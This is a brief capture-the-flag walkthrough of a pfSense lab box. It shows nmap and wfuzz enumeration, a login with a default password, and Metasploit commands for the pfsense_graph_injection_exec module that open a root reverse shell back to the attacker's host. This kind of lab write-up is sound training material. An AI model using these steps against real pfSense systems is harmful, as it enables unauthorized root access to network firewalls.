Sense was another box that you can smash out in 10 minutes you might have spare. Not much to be learnt from this one as it was very straight forward.

Nmap scan

80/tcp open http lighttpd 1.4.35
|_http-server-header: lighttpd/1.4.35
|_http-title: Did not follow redirect to
443/tcp open ssl/https?
|_ssl-date: TLS randomness does not represent time

Navigating to the webserver we get shown a pfsense login page and not much else.

Wfuzz results

wfuzz -c -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt --hc 404,301
001197: C=200 9 L 40 W 271 Ch "changelog"
112347: C=200 6 L 12 W 106 Ch "system-users"

Changelog indicates the current version is vulnerable to something. system-users indicates the username ‘rohit’ and ‘company-default’ exist. Trying the username rohit and pfsense default password of ‘pfsense’ lets us in.


Searching for an exploit with this platform returns a metasploit module that fits our needs, filling in the details we know we can run the exploit.

msf exploit(unix/http/pfsense_graph_injection_exec) > set RHOST
msf exploit(unix/http/pfsense_graph_injection_exec) > set USERNAME rohit
USERNAME => rohit
msf exploit(unix/http/pfsense_graph_injection_exec) > set LHOST tun0
msf exploit(unix/http/pfsense_graph_injection_exec) > exploit

The above exploit yields a root level shell so theres no need to extend privileges.